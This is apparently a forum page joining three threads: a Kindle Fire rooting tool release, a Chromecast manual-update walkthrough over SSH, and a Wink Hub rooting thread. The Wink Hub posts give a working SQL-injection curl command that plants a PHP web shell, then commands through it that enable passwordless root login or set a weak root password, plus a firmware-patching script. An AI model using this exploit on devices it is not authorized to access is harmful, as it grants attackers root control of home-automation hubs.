Due to recent updates, I've decided to remove the option to install Hashcode's 2nd bootloader. There are too many areas where things can go wrong so I think it would be best to let the user follow the small handful of instructions in the 2nd bootloader thread to get it done. IMO, it is not worth the risk to rely on the user to make sure a downgraded stock bootloader is installed before running the script. Plus I think using a script toinstall the downgraded bootloader gives users a false sense of safety in what is potentially very dangerous to do.
ROOT PLUS for 2nd Generation Kindle Fires
That's right. This works for ALL 2nd generation Kindle Fires.
What does it do?
The screenshot above should answer that question pretty quickly.
What do you need to know?
Since Hashcode's bootloader hack is device specific, you must download the version for your device. Each one has the exact same script but the stack, boot and recovery images are different for each particular device. You must have the SoupKit installed for this to work properly. It installs in the same way as the SoupKit; unzip, double click, run in terminal, blah blah.
Make sure you have ADB enabled under “Security” in the settings.
Anything else?
At any point after installation, if you need to run the utility again, just type "rootplus" in the terminal.
What's next?
I have a few more things in store for you guys and they will all be made for the SoupKit. As packages are installed, just type the name of the package in any terminal to launch them at any point (hence "modular"). Everything will be easy to install, easy to launch, and new user friendly.
Don't be skerrd. Move out of your comfort zone a little and give Linux and SoupKit a try. I'm sure you won't be disappointed.
Credits:
* Bin4ry - of course, for providing the root exploit
* Dees_Troy - for Team Win Recovery
* prokennexusa and his team - for testing this out on all of the second generation devices
* Thepooch - for extensive testing and always being there to lend a hand
Downloads:
SoupKit - http://d-h.st/PbX
RootPlus for all Kindle Fires - http://d-h.st/jOe
Changelog:
04-23-2013 - Update (RootPlus)
* Removed option to install Hashcode's 2nd bootloader, for safety reasons. There is absolutely nothing wrong with Hashcode's 2nd bootloader. The risk lies in recent updates from Amazon.
03-19-2013 - Update + bugfix (RootPlus)
* Fixed issue with 2nd bootloader install - everything works as it should now
* Added timestamp to saved partitions. Gives users the ability to save more than one set of partition images
03-18-2013 - Update: (RootPlus)
* Changed how 2nd bootloader is installed for compatibility with the KF2
* Added ability to update custom recovery. No need to update the script every time a new recovery is released.
* Added ability to choose partition images to be installed if more than one set exist in the BACKUP folder
* More intuitive restore of saved partition images - will hopefully prevent any chance of user error
03-16-2013 - Bugfix: (RootPlus)
* Fixed issue with permissions on the rootplus script
03-10-2013 - Update: (RootPlus)
* Added extra safety measures, including MD5 check on 2nd bootloader install
02-23-2013 - Initial release
I actually wish I needed this because god damn this is a sexy piece of kit.
Thanks soup
Sent from my Amazon Kindle Fire2 using xda app-developers app
Awesome. So glad to see the kf1 devs working for us over here!
I'll probably never need this, but there are MANY who will find this useful.
Thanks soupmagnet!
--
Sent from my Kindle Fire 2, CM 10.1
Wilkinsss said:
this is a sexy piece of kit.
Click to expand...
Click to collapse
Oh, I see what you did there...
soupmagnet said:
Oh, I see what you did there...
Click to expand...
Click to collapse
Well I don't need it I have adb and fastboot running fine on linux already but I still downloaded it anyways, just because I can.
Update 3-10-2013: Added extra safety measures, including MD5 check on 2nd bootloader install
I seem to have installed the soupkit correctly, I followed the instructions. I also installed the root plus in the same manner, but when it installs it just disappears. When I type rootplus in terminal it tells me "permission denied"
It also gives me command not found when I try to open soupkit.sh
thanks
2strokenut said:
I seem to have installed the soupkit correctly, I followed the instructions. I also installed the root plus in the same manner, but when it installs it just disappears. When I type rootplus in terminal it tells me "permission denied"
It also gives me command not found when I try to open soupkit.sh
thanks
Click to expand...
Click to collapse
That sucks...I'll have to fix that. In the meantime you can enter the following in terminal to fix the permissions:
Code:
sudo chmod a+x ~/bin/SoupKit/files/rootplus
Then you should be able to start it by entering "rootplus" in the terminal with no problem.
Sorry for the inconvenience.
[Edit:] There have quite a few downloads since the last update. Has anyone else had this problem?
soupmagnet said:
That sucks...I'll have to fix that. In the meantime you can enter the following in terminal to fix the permissions:
Code:
sudo chmod a+x ~/bin/SoupKit/files/rootplus
Then you should be able to start it by entering "rootplus" in the terminal with no problem.
Sorry for the inconvenience.
[Edit:] There have quite a few downloads since the last update. Has anyone else had this problem?
Click to expand...
Click to collapse
That worked like a charm! Thanks for all you do!
---------- Post added at 02:35 PM ---------- Previous post was at 02:11 PM ----------
I hate to be such a noob, but, I got the thing rooted and now trying to install the bootloader and TWRP, this is as far as I have gotten. Hasn't done anything in about 10 minutes. I've toggled ADB.
Verifying MD5 Checksum...
blaze-stack.img: OK
Checksum matched
Installing stack...
95 KB/s (4096 bytes in 0.041s)
0+1 records in
0+1 records out
4096 bytes transferred in 0.002 secs (2048000 bytes/sec)
Rebooting...
< waiting for device >
---------- Post added at 02:41 PM ---------- Previous post was at 02:35 PM ----------
I exited the terminal and re-ran option 6, this is what it gives me now:
blaze-stack.img: OK
Checksum matched
Installing stack...
93 KB/s (4096 bytes in 0.042s)
0+1 records in
0+1 records out
4096 bytes transferred in 0.001 secs (4096000 bytes/sec)
failed on '/system/etc/install-recovery.sh' - No such file or directory
Rebooting...
< waiting for device >
There may be something off with the timing. In original testing on my KFHD 8.9, that was caused from the script entering the command to reboot too fast. I had the script pause for a second or two before rebooting which seemed to help (or I thought I did). I'll look into it a little further to see if I can make it work better. The error you get on the second time you run the script is because the first time you ran it, that file was renamed so it wouldn't exist the second time around.
[Edit:] Just hold the power button to shut down and then reboot while the script is sitting at "waiting for device"
Hi Soup,
I installed soupkit, I installed rootplus. The terminal just disappears but I assume it installed correctly. What I am trying to figure out is this:
Make sure you have ADB enabled under “Security” in the settings.
I am running Ubuntu Precise. I don't see anything under Settings about Security or about enabling ADB. Can you help me out a bit? Thaks!
[Edit] I had to: sudo chmod a+x ~/bin/SoupKit/files/rootplus too to get a terminal window on rootplus. But it doesn't do anything when I press 1.
[Edit again] Nevermind... was stupid to think that the Security change was in Ubuntu, I found it on the KF.
empoy78th said:
Hi Soup,
I installed soupkit, I installed rootplus. The terminal just disappears but I assume it installed correctly. What I am trying to figure out is this:
Make sure you have ADB enabled under “Security” in the settings.
I am running Ubuntu Precise. I don't see anything under Settings about Security or about enabling ADB. Can you help me out a bit? Thaks!
[Edit] I had to: sudo chmod a+x ~/bin/SoupKit/files/rootplus too to get a terminal window on rootplus. But it doesn't do anything when I press 1.
[Edit again] Nevermind... was stupid to think that the Security change was in Ubuntu, I found it on the KF.
Click to expand...
Click to collapse
Yeah, sorry about that...I'm working to get the permissions fixed now so I can upload a new working version. Barring distractions (yeah right), I should have a new one up within the hour. If nothing else, it will be fixed by the end of the day.
soupmagnet said:
Yeah, sorry about that...I'm working to get the permissions fixed now so I can upload a new working version. Barring distractions (yeah right), I should have a new one up within the hour. If nothing else, it will be fixed by the end of the day.
Click to expand...
Click to collapse
Thanks soup! Just to give you an update (although I think you are working on this already), when I press 1 on root plus, I end up on <waiting for device> although the KF2's finished rebooting. I tried the previous suggestion about holding down the power button and re-launching rootplus, but it didn't resolve it.
I will gladly test your new version. Thanks again!
---------- Post added at 11:39 AM ---------- Previous post was at 11:22 AM ----------
empoy78th said:
Thanks soup! Just to give you an update (although I think you are working on this already), when I press 1 on root plus, I end up on <waiting for device> although the KF2's finished rebooting. I tried the previous suggestion about holding down the power button and re-launching rootplus, but it didn't resolve it.
I will gladly test your new version. Thanks again!
Click to expand...
Click to collapse
Another question if I may:
When you have shell updates, does it use the same folder on the same partition? I am not quite good at Linux yet, so cleaning up previous installations is not my strength at all. Thanks!
empoy78th said:
Another question if I may:
When you have shell updates, does it use the same folder on the same partition? I am not quite good at Linux yet, so cleaning up previous installations is not my strength at all. Thanks!
Click to expand...
Click to collapse
Assuming I understand you correctly,
I write the install script in such a way that updating to a newer version simply replaces what already exists, so there's no need to uninstall anything.
3-16-2013: Fixed issue with permissions on the rootplus script
soupmagnet said:
Assuming I understand you correctly,
I write the install script in such a way that updating to a newer version simply replaces what already exists, so there's no need to uninstall anything.
Click to expand...
Click to collapse
You understood it. Good to know. Thanks!
soupmagnet said:
3-16-2013: Fixed issue with permissions on the rootplus script
Click to expand...
Click to collapse
Do I download both soupkit and rootplus for updates? Sorry for the noob question.
In rootplus, options 1 and 5 worked for me. However, on option 6, I stay at <waiting for device>. Done it twice and also held the power button to no avail.
anyone know a way to force the update over ssh or telnet?
I know several people who can't upgrade.
Here is how I did it via ssh or telnet.
Code:
curl http://pdl.team-eureka.com/ota/19084.001.zip -o /cache/eureka_image.zip
the correct md5 is 2414b9f0fb603ec809cad2b6fec6909f for 19084.001.zip
http://pdl.team-eureka.com/ota/19084.001.zip.md5 is the url for the server md5.
run this command to get the md5.
Code:
busybox md5sum /cache/eureka_image.zip
Code:
rm -r /cache/flashcast-data/
Code:
touch /cache/ota.zip
Code:
curl -H "Content-Type: application/json" http://localhost:8008/setup/reboot -d '{"params":"ota"}' -X POST
I was just following along in.
https://github.com/team-eureka/ChromeCast-OTA/blob/master/chromecast-ota
Was wondering do you have to be on a particular ROM version to do this? I only ask because I rooted my Chromecast back when the exploit first came out but I no longer have the equipment to use Flashcast to update it and as of right now my Chromecast is useless. How do you know which version ROM your are using. My Chromecast is still running the 13300 firmware and I know I have the "Pwned" boot screen but apparently it was before the OTA updates were included in the ROM. Will this method work or do I have to go buy a new Chromecast?
I don't think it will work but I don't really know.
I only know what the update script does. I just wanted to avoid using a usb drive and otg cable.
I also had to update some that are at a remote location. I couldn't physically be there.
klbjr said:
Was wondering do you have to be on a particular ROM version to do this? I only ask because I rooted my Chromecast back when the exploit first came out but I no longer have the equipment to use Flashcast to update it and as of right now my Chromecast is useless. How do you know which version ROM your are using. My Chromecast is still running the 13300 firmware and I know I have the "Pwned" boot screen but apparently it was before the OTA updates were included in the ROM. Will this method work or do I have to go buy a new Chromecast?
Click to expand...
Click to collapse
If you have access to ssh this should work, I think. Wait for someone else to confirm this. But be aware that you should check md5 after downloading the file.
busybox md5sum /cache/eureka_image.zip
BlueCop said:
Since no one will help with this.
Here is how I did it via ssh or telnet.
Code:
curl http://pdl.team-eureka.com/ota/19084.001.zip -o /cache/eureka_image.zip
Code:
rm -r /cache/flashcast-data/
Code:
touch /cache/ota.zip
Code:
curl -H "Content-Type: application/json" http://localhost:8008/setup/reboot -d '{"params":"ota"}' -X POST
I was just following along in.
https://github.com/team-eureka/ChromeCast-OTA/blob/master/chromecast-ota
Click to expand...
Click to collapse
You forgot the check of md5sum step. Without this step you can turn a chromecast in paperweight if it doesn't download the file successfully.
I figured the zip crc would fail if it was a corrupted download. One can still manually verify the md5.
I am looking at the Eureka Sources to add a force upgrade option.
I would love to see a private key signing of the firmwares so people couldn't easily mitm them to pwn your chromecast.
BlueCop said:
I figured the zip crc would fail if it was a corrupted download. One can still manually verify the md5.
I am looking at the Eureka Sources to add a force upgrade option.
I would love to see a private key signing of the firmwares so people couldn't easily mitm them to pwn your chromecast.
Click to expand...
Click to collapse
once we get curl working with the ssl libraries, we plan on moving to https for everything we do.
So I'm out of luck? Well is there anyway to return this to stock because right now I can't use it for anything and would rather get some use out of it vs losing root.
ddggttff3: awesome!
klbjr: why are you out of luck? im confused.
the correct md5 is 2414b9f0fb603ec809cad2b6fec6909f for 19084.001.zip
Code:
busybox md5sum /cache/eureka_image.zip
So BlueCop your saying I can still update this way? I thought you said I couldn't
klbjr said:
So BlueCop your saying I can still update this way? I thought you said I couldn't
Click to expand...
Click to collapse
As your on a ROM before We had the auto-OTA system, this method will not work for you. You will have to manually flash Eureka-ROM using flashcast.
So is there anyway for me to return it to stock because it won't work now with the current ROM and I dont have the tools that I used to originally root it and hate to waste money on another Chromecast. Granted its only $35 but there is nothing wrong with this one.
Sent from my GT-P3100 using XDA Premium HD app
klbjr said:
So is there anyway for me to return it to stock because it won't work now with the current ROM and I dont have the tools that I used to originally root it and hate to waste money on another Chromecast. Granted its only $35 but there is nothing wrong with this one.
Sent from my GT-P3100 using XDA Premium HD app
Click to expand...
Click to collapse
if you can, get on the IRC (#team-eureka on freenode) and I can help you get onto the latest OTA on your device, or stock, (your pick) doing some dirty tricks (hope you don't mind using SSH).
ddggttff3 said:
if you can, get on the IRC (#team-eureka on freenode) and I can help you get onto the latest OTA on your device, or stock, (your pick) doing some dirty tricks (hope you don't mind using SSH).
Click to expand...
Click to collapse
Sure will. Just let me know what time is good for you and I'll have to brush up on SSH.
klbjr said:
Sure will. Just let me know what time is good for you and I'll have to brush up on SSH.
Click to expand...
Click to collapse
Just get on whenever you feel, and even if I am away I will make sure directions are thrown your way.
ddggttff3 said:
Just get on whenever you feel, and even if I am away I will make sure directions are thrown your way.
Click to expand...
Click to collapse
Thank you. I'm hopping on now.
ddggttff3 said:
Just get on whenever you feel, and even if I am away I will make sure directions are thrown your way.
Click to expand...
Click to collapse
Just want to point out to others that you CAN'T BUY support like this! LOL
klbjr said:
Thank you. I'm hopping on now.
Click to expand...
Click to collapse
Sounds good, and its #teameureka not #team-eureka, my bad.
Asphyx said:
Just want to point out to others that you CAN'T BUY support like this! LOL
Click to expand...
Click to collapse
I agree!!! You can't! ddggttff3 found me on IRC, walked me through every step very patiently and made sure I got everything working! Another testament to the goodness and greatness of the devs we have here!
Rooting a Wink Hub with the latest (as of October) firmware (version 0.33) or earlier.
First use a curl command to exploit a SQL injection vulnerability to create a php file used to execute shell commands on the hub:
Code:
curl -d id="1 or 1=1';ATTACH DATABASE '/var/www/exploit.php' AS lol; CREATE TABLE lol.pwn (t TEXT); INSERT INTO lol.pwn (t) VALUES ('<?php passthru(' || char(36) || '_POST[' || char(39) || 'cmd' || char(39) || ']); ?>');--" http://192.168.0.1/dev_detail.php
Now you can supply shell commands to the exploit.php.
If you don't want to mess with ssh keys, now you can run this command to enable root login without using a password. My recommendation would be to immediately ssh in and use the passwd command to change the root password.
Code:
curl -d cmd='sed%20-i%20%27s%2F%3D-sg%2F%3D%2F%27%20%2Fetc%2Fdefault%2Fdropbear%3B%2Fetc%2Finit.d%2FS50dropbear%20restart%3Becho%20-e%20%22%5Cn%5Cn%22%20%7C%20passwd' http://192.168.0.1/exploit.php
For those who don't mind using ssh keys, or want to run other commands:
On the machine I want to copy my ssh key to root so I'd run something like this:
Code:
echo MySSH_PublicKey > /root/.ssh/authorizedkeys
It would be nice if you could just call:
Code:
curl -d cmd='echo MySSH_PublicKey > /root/.ssh/authorizedkeys'
But that won't generally work because of http issues. The key is to urlencode the cmd you want to run using a site like http://meyerweb.com/eric/tools/dencoder/
Just urlencode the bits between the single quotes, the php exploit won't work without the single quotes.
So after getting the urlencoded command I actually invoke:
Code:
curl -d cmd='echo%20MySSH_PublicKey%20%3E%20%2Froot%2F.ssh%2Fauthorizedkeys' http://192.168.0.1/exploit.php
Then you can happily ssh as root to the wink hub!
:victory:
FreeFly said:
Then you can happily ssh as root to the wink hub!
:victory:
Click to expand...
Click to collapse
FIRST REPLY! :good:
This is awesome! I can't wait to see where this goes. We should also get Nashira in here with his awesome android app, BLINK that allows a rooted hub to be controlled locally.
https://github.com/nashira/blink
{
"lightbox_close": "Close",
"lightbox_next": "Next",
"lightbox_previous": "Previous",
"lightbox_error": "The requested content cannot be loaded. Please try again later.",
"lightbox_start_slideshow": "Start slideshow",
"lightbox_stop_slideshow": "Stop slideshow",
"lightbox_full_screen": "Full screen",
"lightbox_thumbnails": "Thumbnails",
"lightbox_download": "Download",
"lightbox_share": "Share",
"lightbox_zoom": "Zoom",
"lightbox_new_window": "New window",
"lightbox_toggle_sidebar": "Toggle sidebar"
}
This awesome. Thanks for the great work
Nice work. This will make things much easier.
Some people (people running Windows for instance) are having issues generating the ssh keys. As a suggestion, can we incorporate the below so that people can just login as root using a password? I believe this would make things even simplier.
Code:
#commands to allow root login using root as password
sed -i 's/=-sg/=/' /etc/default/dropbear;/etc/init.d/S50dropbear restart
echo -e 'root\nroot' | passwd
I don't have enough post to provide the exact command, but it should be something like:
curl -d cmd='sed%20-i%20%27s%2F%3D-sg%2F%3D%2F%27%20%2Fetc%2Fdefault%2Fdropbear%3B%2Fetc%2Finit.d%2FS50dropbear%20restart' hxxp/ipaddress/exploit.php
curl -d cmd='echo%20-e%20%22root%5Cnroot%22%20%7C%20passwd' hxxp/ipaddress/exploit.php
FreeFly said:
Rooting a Wink Hub with the latest (as of October) firmware (version 0.33) or earlier.
Click to expand...
Click to collapse
Very nice!
I started lookng for another PHP hole but never looked that hard as my unit was already rooted. I did my upgrade by downloding the app-rootfs.ubi manually and using ubiformat to flash it on.
However in the official Wink app its still showing me version 0 I've been wading through the upgrade scripts to see where it set's version 33 its in /database somehere If you could take a look at your device and let me know I'd very much appreciate it.
I also have a pretty good script that downloads the update re-exploits the update before it installs the update with ubiformat. There is about 4 or 5 places that have a lot of this wink rooting data. If there is interest I would be happy to setup a forum to focus the very small "scene"
If anyone has setup a kidde smoke alarm via aprontest let me know I have had much luck as of yet. I'll certainly post if I make some headway.
berserko said:
Very nice!
I started lookng for another PHP hole but never looked that hard as my unit was already rooted. I did my upgrade by downloding the app-rootfs.ubi manually and using ubiformat to flash it on.
However in the official Wink app its still showing me version 0 I've been wading through the upgrade scripts to see where it set's version 33 its in /database somehere If you could take a look at your device and let me know I'd very much appreciate it.
I also have a pretty good script that downloads the update re-exploits the update before it installs the update with ubiformat. There is about 4 or 5 places that have a lot of this wink rooting data. If there is interest I would be happy to setup a forum to focus the very small "scene"
If anyone has setup a kidde smoke alarm via aprontest let me know I have had much luck as of yet. I'll certainly post if I make some headway.
Click to expand...
Click to collapse
Here are the files that report the versions to the app.
echo "00.01" > /database/cf_build
echo "00.01" > /database/cf_fver2
echo "00.33" > /database/cf_fver3
berserko said:
There is about 4 or 5 places that have a lot of this wink rooting data. If there is interest I would be happy to setup a forum to focus the very small "scene"
Click to expand...
Click to collapse
Someone over at slickdeals did but doesn't look like there is anything happening over there yet. He's got some links but that is about it.
homeautomation proboards com/board/3/wink-hub
---------- Post added at 01:52 AM ---------- Previous post was at 01:16 AM ----------
FreeFly said:
Then you can happily ssh as root to the wink hub!
:victory:
Click to expand...
Click to collapse
It doesn't seem to be taking my key? I can't ssh into it.
disconnected: no supported authentication methods available (server sent publickey)?
nyvram1 said:
We should also get Nashira in here with his awesome android app, BLINK that allows a rooted hub to be controlled locally.
Click to expand...
Click to collapse
BLINK does look very nice. I'd originally wanted to root the hubs just to run my own scripts for home automation, but that app is very cool.
:good:
00.47 is out and this particular sql injection has been closed
00.47 is out and this particular sql injection has been closed
nyvram1 said:
FIRST REPLY! :good:
This is awesome! I can't wait to see where this goes. We should also get Nashira in here with his awesome android app, BLINK that allows a rooted hub to be controlled locally.
Click to expand...
Click to collapse
I'm also interested in Nashira's project, but I'm looking to use his work to figure out how to send commands from a Raspberry Pi that will be the equivalent of pushing a light-on button on the Android app. Being able to issue commands to the wink by running a python script, for example, would open up the hub to be used in conjunction with lots of home automation platforms. I have a bunch of cheap Arduino sensors integrated with an open source home automation system that is much more flexible than Wink, so I'd just like to use the Wink hub for its radios.
It looks like you can do a HTTP post to mimic a button push, but that's something I'm not familiar with. If someone has any insights, I'd appreciate it.
---------- Post added at 05:21 AM ---------- Previous post was at 05:13 AM ----------
FreeFly said:
BLINK does look very nice. I'd originally wanted to root the hubs just to run my own scripts for home automation, but that app is very cool.
:good:
Click to expand...
Click to collapse
Hey, that's what I'm interested in too. Do you think you can use his Android app to figure out how to send HTTP posts to the Wink hub?
qnology said:
00.47 is out and this particular sql injection has been closed
Click to expand...
Click to collapse
Qnology, when did that happen? Is it on the "wink-hub-images.s3.amazonaws.com/00.01/app-rootfs.ubi"? I just manually updated my rooted hub today with that .ubi file. Wonder if I upgraded to 0.33 or 0.47?? I don't even know how to find out.
automonkey said:
It doesn't seem to be taking my key? I can't ssh into it.
disconnected: no supported authentication methods available (server sent publickey)?
Click to expand...
Click to collapse
Did you try the passwordless method?
electronichamsters said:
Do you think you can use his Android app to figure out how to send HTTP posts to the Wink hub?
Click to expand...
Click to collapse
Pretty easy. His API is https://github.com/nashira/blink/blob/master/server/api/commands/index.php It's really a wrapper for the aprontest command. Pretty easy to use python to send JSON messages to the commands/index.php. Play with aprontest by itself for a bit first and you'll understand how to use it to switch and dim the lights:
http://gtvhacker.com/index.php/Wink_Hub
Then you'll understand you just send a command (update) with the master id for the light you want to switch, and value id (1 for dim, 2 for on/off), and a corresponding value (1-255 for dim / ON or OFF) wrap it in JSON and send to command/index.php
I'm going to write some code to do this myself so I'll post some samples here when I do.
Really?? They already patched it?
electronichamsters said:
Qnology, when did that happen? Is it on the "wink-hub-images.s3.amazonaws.com/00.01/app-rootfs.ubi"? I just manually updated my rooted hub today with that .ubi file. Wonder if I upgraded to 0.33 or 0.47?? I don't even know how to find out.
Click to expand...
Click to collapse
I guess yesterday. I upgraded a new out of box Win Hub using the iOS Wink App thinking that I would get 00.33. When I ran the curl command against dev_detail.php and received a 404, I checked my iOS Wink app and it showed that the Hub was on firmware 00.47.
FreeFly said:
Did you try the passwordless method?
Click to expand...
Click to collapse
Yes I got that to work via Rezurok's cmd.php, doing it via curl on windows in a command window wasn't giving me anything useful for feedback, whereas the cmd.php let me know it was pissy because it was too short. I've got it working now.
electronichamsters said:
Qnology, when did that happen? Is it on the "wink-hub-images.s3.amazonaws.com/00.01/app-rootfs.ubi"? I just manually updated my rooted hub today with that .ubi file. Wonder if I upgraded to 0.33 or 0.47?? I don't even know how to find out.
Click to expand...
Click to collapse
Run an MD5sum against your app-rootfs.ubi if the md5sum is 55574706f2cbf4f6e17e4d224b63287d then you have version 47. I don't havre the 33 md5sum in front of me I'll post it if I can find it...
---------- Post added at 02:38 PM ---------- Previous post was at 02:20 PM ----------
berserko said:
Run an MD5sum against your app-rootfs.ubi if the md5sum is 55574706f2cbf4f6e17e4d224b63287d then you have version 47. The MD5sum for 33 is eec07feee1fa1a4a06e05a00af18156f
Click to expand...
Click to collapse
I found the update went live at:
2014-12-10T22:16:58.000Z
I assume Z means zulu so 5:16pm eastern?
Here is the commands I used to upgrade my pre-rooted Wink for 33 to 47
Hope this helps:
Code:
echo "1" > /database/DO_UPDATE
reboot
Once it comes back in upgrade mode I ran the following:
Code:
cd /tmp
echo "127.0.0.1 localhost" > /etc/hosts
echo "127.0.0.1 flex-dvt" >> /etc/hosts
wget hXXp://wink-hub-images.s3.amazonaws.com/00.01/app-rootfs.ubi <--- Fix the URL forum is breaking it on me...
ubiformat /dev/mtd5 -f /tmp/app-rootfs.ubi
ubiattach -p /dev/mtd5
mkdir /tmp/updater
mount -t ubifs ubi2:rootfs /tmp/updater
sed -i 's/=-sg/=/' /tmp/updater/etc/default/dropbear
rm -f /tmp/updater/etc/init.d/S99local
cp /var/www/set_dev_value.php /tmp/updater/var/www
fw_setenv bootdelay 5
sed -i 's/bootdelay 0/bootdelay 5/' /database_default/u-boot.env
cp /etc/shadow /tmp/updater/etc
mkdir /tmp/updater/root/.ssh
cp /root/.ssh/authorized_keys /tmp/updater/root/.ssh/authorized_keys
echo "127.0.0.1 hub-api.winkapp.com" >> /tmp/updater/etc/hosts
echo "127.0.0.1 hub-updates.winkapp.com" >> /tmp/updater/etc/hosts
echo "127.0.0.1 wink-hub-images.s3.amazonaws.com" >> /tmp/updater/etc/hosts
sed -i 's/rm \/database\/wpa_supplicant.conf/echo WPA Fix #rm \/database\/wpa_supplicant.conf/' /tmp/updater/etc/init.d/S31platform
sed -i 's/#ttyAM0/ttyAM0/' /tmp/updater/etc/inittab
echo "00.01" > /database/cf_build
echo "00.01" > /database/cf_fver2
echo "00.47" > /database/cf_fver3
echo "127.0.0.1 hub-api.winkapp.com" >> /etc/hosts
echo "127.0.0.1 hub-updates.winkapp.com" >> /etc/hosts
echo "127.0.0.1 wink-hub-images.s3.amazonaws.com" >> /etc/hosts
echo "0" > /database/DO_UPDATE
reboot
Once the reboot completes the device will come back online as version 47 This worked fine for me but as always YMMV. The script keeps creates enough holes you should be able to get back in one way or another...
681
Starting from a new in box Wink Hub, is there anything I need to do before hand to make sure I can SSH into the "upgrade mode" partition? It'a not clear if people are using a Serial Console connection to access the "upgrade mode" partition or if they are SSHing in. For SSH access, I would assume the authorized_keys file needs to be updated (so the upgrade mode partition would need to be mounted and updated). Just need some confirmation. Thank you
berserko said:
Here is the commands I used to upgrade my pre-rooted Wink for 33 to 47
Hope this helps:
Code:
echo "1" > /database/DO_UPDATE
reboot
Click to expand...
Click to collapse
berserko said:
Run an MD5sum against your app-rootfs.ubi if the md5sum is 55574706f2cbf4f6e17e4d224b63287d then you have version 47. I don't havre the 33 md5sum in front of me I'll post it if I can find it...
Click to expand...
Click to collapse
I ran a MD5sum on the copy of app-rootfs.ubi that I downloaded from the the amazon aws link sometime on dec 10th. It is "eec07feee1fa1a4a06e05a00af18156f".
I have no idea if it's v0.33 or 0.47. If someone else has a file they're sure is 0.33, can they run a MD5sum on it?
If I rooted and never updated, so I have original firmware, can I use the method you described to go straight to 47?
Thanks
Jeff
qnology said:
Starting from a new in box Wink Hub, is there anything I need to do before hand to make sure I can SSH into the "upgrade mode" partition? It'a not clear if people are using a Serial Console connection to access the "upgrade mode" partition or if they are SSHing in. For SSH access, I would assume the authorized_keys file needs to be updated (so the upgrade mode partition would need to be mounted and updated). Just need some confirmation. Thank you
Click to expand...
Click to collapse